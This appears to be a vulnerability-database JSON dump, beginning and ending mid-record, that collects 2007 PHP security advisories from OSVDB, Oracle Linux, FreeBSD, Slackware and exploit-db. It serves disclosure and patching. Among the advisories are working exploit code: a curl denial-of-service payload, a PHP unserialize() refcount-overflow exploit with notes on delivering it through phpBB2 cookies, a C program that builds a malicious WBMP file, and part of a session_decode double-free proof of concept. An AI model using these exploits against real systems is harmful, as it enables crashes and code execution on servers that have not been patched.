By passing crafted data, an attacker can overwrite variables pointing to the GLOBALS array or the session data in _SESSION allowing for the execution of arbitrary code.\n## References:\nVendor URL: http://www.php.net/\n[Secunia Advisory ID:25025](https://secuniaresearch.flexerasoftware.com/advisories/25025/)\n[Secunia Advisory ID:25062](https://secuniaresearch.flexerasoftware.com/advisories/25062/)\n[Secunia Advisory ID:25192](https://secuniaresearch.flexerasoftware.com/advisories/25192/)\n[Secunia Advisory ID:24924](https://secuniaresearch.flexerasoftware.com/advisories/24924/)\n[Secunia Advisory ID:24910](https://secuniaresearch.flexerasoftware.com/advisories/24910/)\n[Secunia Advisory ID:26235](https://secuniaresearch.flexerasoftware.com/advisories/26235/)\n[Secunia Advisory ID:24941](https://secuniaresearch.flexerasoftware.com/advisories/24941/)\n[Secunia Advisory ID:25445](https://secuniaresearch.flexerasoftware.com/advisories/25445/)\n[Secunia Advisory ID:24945](https://secuniaresearch.flexerasoftware.com/advisories/24945/)\nRedHat RHSA: RHSA-2007:0163\nRedHat RHSA: RHSA-2007:0154\nRedHat RHSA: RHSA-2007:0155\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-April/000176.html\nOther Advisory URL: http://www.php-security.org/MOPB/MOPB-32-2007.html\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20070501-01-P.asc\nOther Advisory URL: http://www.us.debian.org/security/2007/dsa-1282\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200705-19.xml\nOther Advisory URL: http://www.us.debian.org/security/2007/dsa-1283\nOther Advisory URL: http://docs.info.apple.com/article.html?artnum=306172\nFrSIRT Advisory: ADV-2007-2732\n[CVE-2007-1711](https://vulners.com/cve/CVE-2007-1711)\nBugtraq ID: 23121\nBugtraq ID: 25159\n", "modified": "2007-03-25T02:55:34", "published": "2007-03-25T02:55:34", "href": "https://vulners.com/osvdb/OSVDB:33946", "id": "OSVDB:33946", "title": "PHP session_decode() Double Free 
Arbitrary Code Execution", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "description": "## Vulnerability Description\nZend Engine I in PHP 4.4.6 and lower, and Zend Engine II in PHP versions 5.2.1 and lower, contain flaws that may allow a remote denial of service. The issue is due to the application not enforcing sanity checks for the depth of nested arrays which allows a remote user to create very deeply nested array structures. Since the destruction of PHP arrays is done in a recursive way, the attempted destruction of the user's deeply nested array will result in a crash when the stack limit is exhausted, leading to a loss of availability for the service.\n## Technical Description\n$ php -r 'echo \"a\".str_repeat(\"[]\",200000).\"=1&a=0\";' > postdata\n$ curl http://127.0.0.1/phpmyadmin/ -d @postdata\ncurl: (52) Empty reply from server\n## Solution Description\nUpgrade to version 4.4.7, 5.2.2 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Configure your web application firewall to drop high amounts of '[' in variable names.\n## Short Description\nZend Engine I in PHP 4.4.6 and lower, and Zend Engine II in PHP versions 5.2.1 and lower, contain flaws that may allow a remote denial of service. The issue is due to the application not enforcing sanity checks for the depth of nested arrays which allows a remote user to create very deeply nested array structures. 
Since the destruction of PHP arrays is done in a recursive way, the attempted destruction of the user's deeply nested array will result in a crash when the stack limit is exhausted, leading to a loss of availability for the service.\n## References:\nVendor URL: http://www.php.net/\nVendor URL: http://www.zend.com/products/zend_engine\nSecurity Tracker: 1017771\n[Secunia Advisory ID:25192](https://secuniaresearch.flexerasoftware.com/advisories/25192/)\n[Secunia Advisory ID:24924](https://secuniaresearch.flexerasoftware.com/advisories/24924/)\n[Secunia Advisory ID:24910](https://secuniaresearch.flexerasoftware.com/advisories/24910/)\n[Secunia Advisory ID:24941](https://secuniaresearch.flexerasoftware.com/advisories/24941/)\n[Secunia Advisory ID:24909](https://secuniaresearch.flexerasoftware.com/advisories/24909/)\n[Secunia Advisory ID:25445](https://secuniaresearch.flexerasoftware.com/advisories/25445/)\n[Secunia Advisory ID:26048](https://secuniaresearch.flexerasoftware.com/advisories/26048/)\n[Secunia Advisory ID:24945](https://secuniaresearch.flexerasoftware.com/advisories/24945/)\n[Secunia Advisory ID:25816](https://secuniaresearch.flexerasoftware.com/advisories/25816/)\n[Secunia Advisory ID:27864](https://secuniaresearch.flexerasoftware.com/advisories/27864/)\nRedHat RHSA: RHSA-2007:0163\nRedHat RHSA: RHSA-2007:0154\nRedHat RHSA: RHSA-2007:0155\nOther Advisory URL: https://launchpad.net/bugs/cve/2007-1285\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:089\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-April/000176.html\nOther Advisory URL: http://lists.opensuse.org/opensuse-security-announce/2007-07/msg00006.html\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20070501-01-P.asc\nOther Advisory URL: http://www.php-security.org/MOPB/MOPB-03-2007.html\nOther Advisory URL: http://en.securitylab.ru/nvd/292100.php\nOther Advisory URL: 
http://www.gentoo.org/security/en/glsa/glsa-200705-19.xml\nOther Advisory URL: http://www.novell.com/support/search.do?cmd=displayKC&docType=kc&externalId=http--supportnovellcom-techcenter-psdb-3e349d7efffdfecc96ca44f446d1b2c4html&sliceId=&dialogID=38853114&stateId=0%200%2038851668\nOther Advisory URL: http://www.ubuntu.com/usn/usn-549-1\nNews Article: http://www.techworld.com/security/news/index.cfm?newsID=8175\n[CVE-2007-1285](https://vulners.com/cve/CVE-2007-1285)\nBugtraq ID: 22764\n", "modified": "2007-03-01T00:00:00", "published": "2007-03-01T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:32769", "id": "OSVDB:32769", "title": "PHP Zend Engine Variable Destruction Deep Recursion Overflow", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "description": "## Vulnerability Description\nPHP contains a flaw that may allow a context-dependent attacker to elevate privileges. The issue can occur when the unserialize() function is used on an attacker-supplied string, which can result in an integer overflow in the refcount variable in _zval_struct through the creation of a large number of references for a specific variable, leading to a double destruction of the underlying variable. 
It is possible that the flaw may allow a remote attacker to execute arbitrary code resulting in a loss of integrity.\n## Technical Description\nThe PHP 4.4.5 release announcement fails to mention that this vulnerability was patched in the 4.4.5 PHP version.\n\nThe exploit below is designed for Linux x86 systems where 0x08064058 is a readable address in the PHP process and will try to execute instruction at 0x99887766, which for arbitrary code execution would need to be replaced with a pointer to your shellcode.\n\n-----------------\nExploit\n-----------------\n<?php\n die(\"REMOVE THIS LINE\");\n $hashtable = str_repeat(\"A\", 39);\n $hashtable[5*4+0]=chr(0x58);\n $hashtable[5*4+1]=chr(0x40);\n $hashtable[5*4+2]=chr(0x06);\n $hashtable[5*4+3]=chr(0x08);\n $hashtable[8*4+0]=chr(0x66);\n $hashtable[8*4+1]=chr(0x77);\n $hashtable[8*4+2]=chr(0x88);\n $hashtable[8*4+3]=chr(0x99);\n $str = 'a:100000:{s:8:\"AAAABBBB\";a:3:{s:12:\"0123456789AA\";a:1:{s:12:\"AAAABBBBCCCC\";i:0;}s:12:\"012345678AAA\";i:0;s:12:\"012345678BAN\";i:0;}';\n for ($i=0; $i<65535; $i++) {\n $str .= 'i:0;R:2;';\n }\n $str .= 's:39:\"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\";s:39:\"'.$hashtable.'\";i:0;R:3;';\n unserialize($str);\n?>\n\nTo exploit the PHP application phpBB2, which uses the unserialize() function, you would need to put a similar string into a cookie, working around the size limit of HTTP headers by using many Cookie: headers. Additionally, at the end of every line you would need to place a line terminator s:2:\" and start every following line with \";N; of course with URL encoded ';'\n## Solution Description\nUpgrade to version 4.4.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nPHP contains a flaw that may a context-dependent attacker to elevate privileges. 
The issue can occur when the unserialize() function is used on an attacker supplied string, which can result in an integer overflow in the refcount variable in _zval_struct through the creation of a large number of references for a specific variable leading to a double destruction of the underlying variable. It is possible that the flaw may allow a remote attacker to execute arbitrary code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.php.net/\nVendor Specific Solution URL: http://www.php.net/downloads.php\nVendor Specific News/Changelog Entry: http://www.php.net/ChangeLog-4.php\n[Vendor Specific Advisory URL](http://www8.itrc.hp.com/service/cki/docDisplay.do?docId=c01056506)\n[Secunia Advisory ID:24089](https://secuniaresearch.flexerasoftware.com/advisories/24089/)\n[Secunia Advisory ID:25025](https://secuniaresearch.flexerasoftware.com/advisories/25025/)\n[Secunia Advisory ID:25062](https://secuniaresearch.flexerasoftware.com/advisories/25062/)\n[Secunia Advisory ID:25850](https://secuniaresearch.flexerasoftware.com/advisories/25850/)\n[Secunia Advisory ID:25423](https://secuniaresearch.flexerasoftware.com/advisories/25423/)\n[Secunia Advisory ID:25192](https://secuniaresearch.flexerasoftware.com/advisories/25192/)\n[Secunia Advisory ID:27102](https://secuniaresearch.flexerasoftware.com/advisories/27102/)\n[Secunia Advisory ID:24924](https://secuniaresearch.flexerasoftware.com/advisories/24924/)\n[Secunia Advisory ID:24910](https://secuniaresearch.flexerasoftware.com/advisories/24910/)\n[Secunia Advisory ID:24419](https://secuniaresearch.flexerasoftware.com/advisories/24419/)\n[Secunia Advisory ID:24941](https://secuniaresearch.flexerasoftware.com/advisories/24941/)\n[Secunia Advisory ID:24606](https://secuniaresearch.flexerasoftware.com/advisories/24606/)\n[Secunia Advisory ID:25445](https://secuniaresearch.flexerasoftware.com/advisories/25445/)\n[Secunia Advisory 
ID:24945](https://secuniaresearch.flexerasoftware.com/advisories/24945/)\n[Related OSVDB ID: 32770](https://vulners.com/osvdb/OSVDB:32770)\nRedHat RHSA: RHSA-2007:0163\nRedHat RHSA: RHSA-2007:0154\nRedHat RHSA: RHSA-2007:0155\nOther Advisory URL: http://www.php-security.org/MOPB/MOPB-04-2007.html\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-April/000176.html\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200703-21.xml\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20070501-01-P.asc\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200710-02.xml\nOther Advisory URL: http://www.us.debian.org/security/2007/dsa-1282\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200705-19.xml\nOther Advisory URL: http://www.trustix.org/errata/2007/0009/\nOther Advisory URL: http://www.us.debian.org/security/2007/dsa-1283\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-06/0363.html\nKeyword: HPSBTU02232,SSRT071429\nKeyword: HPSBMA02215,SSRT071423\nKeyword: HPSBTU02232,SSRT071429,c01086137\nGeneric Exploit URL: http://www.php-security.org/MOPB/code/MOPB-04-2007.php\nFrSIRT Advisory: ADV-2007-0791\n[CVE-2007-1286](https://vulners.com/cve/CVE-2007-1286)\nBugtraq ID: 22765\n", "modified": "2007-03-02T00:00:00", "published": "2007-03-02T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:32771", "id": "OSVDB:32771", "title": "PHP unserialize() ZVAL Reference Counter Remote Overflow", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:24053](https://secuniaresearch.flexerasoftware.com/advisories/24053/)\n[Secunia Advisory ID:24052](https://secuniaresearch.flexerasoftware.com/advisories/24052/)\n[Secunia Advisory 
ID:24151](https://secuniaresearch.flexerasoftware.com/advisories/24151/)\n[Secunia Advisory ID:25192](https://secuniaresearch.flexerasoftware.com/advisories/25192/)\n[Secunia Advisory ID:24022](https://secuniaresearch.flexerasoftware.com/advisories/24022/)\n[Secunia Advisory ID:24924](https://secuniaresearch.flexerasoftware.com/advisories/24924/)\n[Secunia Advisory ID:24965](https://secuniaresearch.flexerasoftware.com/advisories/24965/)\n[Secunia Advisory ID:25575](https://secuniaresearch.flexerasoftware.com/advisories/25575/)\n[Secunia Advisory ID:23916](https://secuniaresearch.flexerasoftware.com/advisories/23916/)\n[Secunia Advisory ID:24107](https://secuniaresearch.flexerasoftware.com/advisories/24107/)\n[Secunia Advisory ID:24143](https://secuniaresearch.flexerasoftware.com/advisories/24143/)\n[Secunia Advisory ID:24945](https://secuniaresearch.flexerasoftware.com/advisories/24945/)\nRedHat RHSA: RHSA-2007:0153\nRedHat RHSA: RHSA-2007:0155\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-April/000176.html\nOther Advisory URL: http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=224607\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:035\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20070501-01-P.asc\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:036\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-February/000145.html\nOther Advisory URL: http://www.trustix.org/errata/2007/0007/\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:038\nOther Advisory URL: http://fedoranews.org/cms/node/2631\nOther Advisory URL: http://www.ubuntu.com/usn/usn-473-1\nFrSIRT Advisory: ADV-2007-0400\n[CVE-2007-0455](https://vulners.com/cve/CVE-2007-0455)\nBugtraq ID: 22289\n", "modified": "2007-01-29T10:48:48", "published": "2007-01-29T10:48:48", "href": "https://vulners.com/osvdb/OSVDB:33008", "id": 
"OSVDB:33008", "title": "GD Graphics Library gdImageStringFTEx() Function Crafted JIS Encoded Font Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nPHP contains a flaw that may allow a remote attacker to bypass security restrictions. The issue is due to the mb_parse_str function setting the internal register_globals flag but not properly disabling it in some cases when a script terminates. This may allow an attacker to execute a PHP script with register_globals functionality.\n## Solution Description\nUpgrade to version 4.4.7, 5.2.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nPHP contains a flaw that may allow a remote attacker to bypass security restrictions. The issue is due to the mb_parse_str function setting the internal register_globals flag but not properly disabling it in some cases when a script terminates. 
This may allow an attacker to execute a PHP script with register_globals functionality.\n## References:\nVendor URL: http://www.php.net/\n[Secunia Advisory ID:25062](https://secuniaresearch.flexerasoftware.com/advisories/25062/)\n[Secunia Advisory ID:25192](https://secuniaresearch.flexerasoftware.com/advisories/25192/)\n[Secunia Advisory ID:24924](https://secuniaresearch.flexerasoftware.com/advisories/24924/)\n[Secunia Advisory ID:26235](https://secuniaresearch.flexerasoftware.com/advisories/26235/)\n[Secunia Advisory ID:24965](https://secuniaresearch.flexerasoftware.com/advisories/24965/)\n[Secunia Advisory ID:24909](https://secuniaresearch.flexerasoftware.com/advisories/24909/)\n[Secunia Advisory ID:25057](https://secuniaresearch.flexerasoftware.com/advisories/25057/)\n[Secunia Advisory ID:25445](https://secuniaresearch.flexerasoftware.com/advisories/25445/)\n[Secunia Advisory ID:24945](https://secuniaresearch.flexerasoftware.com/advisories/24945/)\nRedHat RHSA: RHSA-2007:0153\nRedHat RHSA: RHSA-2007:0155\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:089\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-April/000176.html\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20070501-01-P.asc\nOther Advisory URL: http://www.php-security.org/MOPB/MOPB-26-2007.html\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200705-19.xml\nOther Advisory URL: http://www.ubuntu.com/usn/usn-455-1\nOther Advisory URL: http://www.us.debian.org/security/2007/dsa-1283\nOther Advisory URL: http://docs.info.apple.com/article.html?artnum=306172\n[CVE-2007-1583](https://vulners.com/cve/CVE-2007-1583)\nBugtraq ID: 23016\n", "modified": "2007-03-18T10:29:24", "published": "2007-03-18T10:29:24", "href": "https://vulners.com/osvdb/OSVDB:33940", "id": "OSVDB:33940", "title": "PHP mb_parse_str() register_globals Functionality Invocation", "type": "osvdb", "cvss": {"score": 6.8, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nPHP contains a flaw that may allow a remote attacker to manipulate mail functionality. The issue is due to mail function not properly sanitizing user-supplied input. By supplying CRLF (newline) characters, an attacker can inject arbitrary e-mail headers which may allow them to send mail to arbitrary hosts by supplying a control character after a Subject: or TO: parameter.\n## Solution Description\nUpgrade to version 5.2.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nPHP contains a flaw that may allow a remote attacker to manipulate mail functionality. The issue is due to mail function not properly sanitizing user-supplied input. By supplying CRLF (newline) characters, an attacker can inject arbitrary e-mail headers which may allow them to send mail to arbitrary hosts by supplying a control character after a Subject: or TO: parameter.\n## References:\nVendor URL: http://www.php.net/\n[Secunia Advisory ID:25025](https://secuniaresearch.flexerasoftware.com/advisories/25025/)\n[Secunia Advisory ID:25062](https://secuniaresearch.flexerasoftware.com/advisories/25062/)\n[Secunia Advisory ID:25056](https://secuniaresearch.flexerasoftware.com/advisories/25056/)\n[Secunia Advisory ID:25192](https://secuniaresearch.flexerasoftware.com/advisories/25192/)\n[Secunia Advisory ID:24924](https://secuniaresearch.flexerasoftware.com/advisories/24924/)\n[Secunia Advisory ID:26235](https://secuniaresearch.flexerasoftware.com/advisories/26235/)\n[Secunia Advisory ID:24965](https://secuniaresearch.flexerasoftware.com/advisories/24965/)\n[Secunia Advisory ID:24909](https://secuniaresearch.flexerasoftware.com/advisories/24909/)\n[Secunia Advisory 
ID:25057](https://secuniaresearch.flexerasoftware.com/advisories/25057/)\n[Secunia Advisory ID:25445](https://secuniaresearch.flexerasoftware.com/advisories/25445/)\nRedHat RHSA: RHSA-2007:0153\nRedHat RHSA: RHSA-2007:0155\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:089\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2007-May/0007.html\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20070501-01-P.asc\nOther Advisory URL: http://www.us.debian.org/security/2007/dsa-1282\nOther Advisory URL: http://www.php-security.org/MOPB/MOPB-33-2007.html\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200705-19.xml\nOther Advisory URL: http://www.php-security.org/MOPB/MOPB-34-2007.html\nOther Advisory URL: http://www.ubuntu.com/usn/usn-455-1\nOther Advisory URL: http://www.us.debian.org/security/2007/dsa-1283\nOther Advisory URL: http://docs.info.apple.com/article.html?artnum=306172\n[CVE-2007-1718](https://vulners.com/cve/CVE-2007-1718)\n[CVE-2007-1717](https://vulners.com/cve/CVE-2007-1717)\nBugtraq ID: 23146\nBugtraq ID: 23145\n", "modified": "2007-03-26T06:57:38", "published": "2007-03-26T06:57:38", "href": "https://vulners.com/osvdb/OSVDB:33948", "id": "OSVDB:33948", "title": "PHP mail() Function Arbitrary Mail Sending", "type": "osvdb", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:37:54", "bulletinFamily": "unix", "description": " [5.1.6-12.el5]\n - add security fix for CVE-2007-1864, SOAP redirect handling issue,\n FTP CRLF injection issue (#235016)\n \n [5.1.6-11.el5]\n - add security fix for CVE-2007-1718 (#235016)\n \n [5.1.6-9.el5]\n - add security fix for CVE-2007-1583 (#235016)\n - add security fixes for CVE-2007-0455, CVE-2007-1001 (#235036)\n \n [5.1.6-7.el5]\n - add security fix for CVE-2007-1285 (#231597)\n \n [5.1.6-6.el5]\n - add security fixes for: CVE-2007-0906, 
CVE-2007-0907,\n CVE-2007-0908, CVE-2007-0909, CVE-2007-0910, CVE-2007-0988 (#229013) ", "modified": "2007-06-26T00:00:00", "published": "2007-06-26T00:00:00", "id": "ELSA-2007-0348", "href": "http://linux.oracle.com/errata/ELSA-2007-0348.html", "title": "Important: php security update ", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2018-08-31T01:15:41", "bulletinFamily": "unix", "description": "\nThe PHP development team reports:\n\nSecurity Enhancements and Fixes in PHP 5.2.2 and PHP\n\t 4.4.7:\n\nFixed CVE-2007-1001, GD wbmp used with invalid image\n\t size\nFixed asciiz byte truncation inside mail()\nFixed a bug in mb_parse_str() that can be used to\n\t activate register_globals\nFixed unallocated memory access/double free in\n\t array_user_key_compare()\nFixed a double free inside session_regenerate_id()\nAdded missing open_basedir & safe_mode checks to zip://\n\t and bzip:// wrappers.\nLimit nesting level of input variables with\n\t max_input_nesting_level as fix for.\nFixed CRLF injection inside ftp_putcmd().\nFixed a possible super-global overwrite inside\n\t import_request_variables().\nFixed a remotely trigger-able buffer overflow inside\n\t bundled libxmlrpc library.\n\nSecurity Enhancements and Fixes in PHP 5.2.2 only:\n\nFixed a header injection via Subject and To parameters\n\t to the mail() function\nFixed wrong length calculation in unserialize S\n\t type.\nFixed substr_compare and substr_count information\n\t leak.\nFixed a remotely trigger-able buffer overflow inside\n\t make_http_soap_request().\nFixed a buffer overflow inside\n\t user_filter_factory_create().\n\nSecurity Enhancements and Fixes in PHP 4.4.7 only:\n\nXSS in phpinfo()\n\n\n", "modified": "2014-04-01T00:00:00", "published": "2007-05-03T00:00:00", "id": "F5E52BF5-FC77-11DB-8163-000E0C2E438A", "href": "https://vuxml.freebsd.org/freebsd/f5e52bf5-fc77-11db-8163-000e0c2e438a.html", 
"title": "php -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "slackware": [{"lastseen": "2018-08-31T02:37:11", "bulletinFamily": "unix", "description": "New php packages are available for Slackware 10.2, 11.0, and -current\nto improve the stability and security of PHP. Quite a few bugs were\nfixed -- please see http://www.php.net for a detailed list.\nAll sites that use PHP are encouraged to upgrade. Please note that\nwe haven't tested all PHP applications for backwards compatibility\nwith this new upgrade, so you should have the old package on hand\njust in case.\n\nBoth PHP 4.4.7 and PHP 5.2.2 updates have been provided.\n\n\nHere are the details from the Slackware 11.0 ChangeLog:\n\nextra/php5/php-5.2.2-i486-1_slack11.0.tgz:\n Upgraded to php-5.2.2.\n This fixes bugs and improves security.\n For more details, see:\n http://www.php.net/releases/5_2_2.php\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1001\n (* Security fix *)\npatches/packages/php-4.4.7-i486-1_slack11.0.tgz:\n Upgraded to php-4.4.7.\n This fixes bugs and improves security.\n For more details, see:\n http://www.php.net/releases/4_4_7.php\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1001\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\nfrom ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated packages for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/php-4.4.7-i486-1_slack10.2.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/testing/packages/php5/php-5.2.2-i486-1_slack10.2.tgz\n\nUpdated packages for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/php-4.4.7-i486-1_slack11.0.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/extra/php5/php-5.2.2-i486-1_slack11.0.tgz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-4.4.7-i486-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-current/extra/php5/php-5.2.2-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 10.2 packages:\n56aa46827b63ffbc362727cbaaf586e8 php-4.4.7-i486-1_slack10.2.tgz\nc05e8b71616725493bee7d150b8dc62a php-5.2.2-i486-1_slack10.2.tgz\n\nSlackware 11.0 packages:\nb949d684bd04d1f843c28ee01076d246 php-4.4.7-i486-1_slack11.0.tgz\nb7be5a1e3ef61d1c758513caeda9c7c7 php-5.2.2-i486-1_slack11.0.tgz\n\nSlackware -current packages:\n38a8fe4b7bd5637e09a5a28f50a19a0e php-4.4.7-i486-1.tgz\nb49eb13cc4110617f5515426f747b8d7 php-5.2.2-i486-1.tgz\n\n\nInstallation instructions:\n\nFirst, stop apache:\n > apachectl stop\n\nNext, upgrade to the new PHP package:\n > upgradepkg php-4.4.7-i486-1_slack11.0.tgz\n\nFinally, restart apache:\n > apachectl start (or: apachectl startssl)", "modified": "2007-05-07T21:22:33", "published": "2007-05-07T21:22:33", "id": "SSA-2007-127-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2007&m=slackware-security.470053", "title": "php", "type": "slackware", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T11:12:35", "bulletinFamily": "exploit", "description": "PHP 5.2.1 GD Extension WBMP File 
Integer Overflow Vulnerabilities. CVE-2007-1001 . Dos exploit for php platform", "modified": "2007-04-07T00:00:00", "published": "2007-04-07T00:00:00", "id": "EDB-ID:29823", "href": "https://www.exploit-db.com/exploits/29823/", "type": "exploitdb", "title": "PHP <= 5.2.1 GD Extension WBMP File Integer Overflow Vulnerabilities", "sourceData": "source: http://www.securityfocus.com/bid/23357/info\r\n\r\nPHP's GD extension is prone to two integer-overflow vulnerabilities because it fails to ensure that integer values aren't overrun.\r\n\r\nSuccessfully exploiting these issues allows attackers to crash the affected application, potentially denying service to legitimate users. Due to the nature of the issues, code execution may also be possible, but this has not been confirmed.\r\n\r\nPHP 5.2.1 and prior versions are vulnerable. \r\n\r\n#define BUFSIZE 1000000\r\n\r\n#include <stdio.h>\r\n\r\nint main()\r\n{\r\n int c;\r\n char buf[BUFSIZE];\r\n\r\n FILE *fp = fopen(\"test.wbmp\",\"w\");\r\n\r\n //write header\r\n c = 0;\r\n fputc(c,fp);\r\n fputc(c,fp);\r\n\r\n //write width = 2^32 / 4 + 1\r\n c = 0x84;\r\n fputc(c,fp);\r\n c = 0x80;\r\n fputc(c,fp);\r\n fputc(c,fp);\r\n fputc(c,fp);\r\n c = 0x01;\r\n fputc(c,fp);\r\n\r\n //write height = 4\r\n c = 0x04;\r\n fputc(c,fp);\r\n\r\n //write some data to cause overflow\r\n fwrite(buf,sizeof(buf),1,fp);\r\n\r\n fclose(fp);\r\n}\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29823/"}, {"lastseen": "2016-01-31T18:50:30", "bulletinFamily": "exploit", "description": "PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC. CVE-2007-1711. 
Dos exploit for linux platform", "modified": "2007-03-27T00:00:00", "published": "2007-03-27T00:00:00", "id": "EDB-ID:3586", "href": "https://www.exploit-db.com/exploits/3586/", "type": "exploitdb", "title": "PHP 4.4.5 / 4.4.6 session_decode Double Free Exploit PoC", "sourceData": "<?php\n ////////////////////////////////////////////////////////////////////////\n // _ _ _ _ ___ _ _ ___ //\n // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \\| || || _ \\ //\n // | __ |/ _` || '_|/ _` |/ -_)| ' \\ / -_)/ _` ||___|| _/| __ || _/ //\n // |_||_|\\__,_||_| \\__,_|\\___||_||_|\\___|\\__,_| |_| |_||_||_| //\n // //\n // Proof of concept code from the Hardened-PHP Project //\n // (C) Copyright 2007 Stefan Esser //\n // //\n ////////////////////////////////////////////////////////////////////////\n // PHP 4.4.5/4.4.6 session_decode() Double Free Vulnerability //\n ////////////////////////////////////////////////////////////////////////\n\n // This is meant as a protection against remote file inclusion.\n die(\"REMOVE THIS LINE\");\n\n ini_set(\"session.serialize_handler\", \"php\");\n session_start();\n\n $varname = str_repeat(\"D\", 39);\n $$varname = &$_SESSION;\n\n // Trigger the double free\n \n session_decode($varname.'|i:0;');\n $_________________x = \"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJ\";\n $_________________a = array(\"OneElement\");\n\n // Now x and a point to the same memory. 
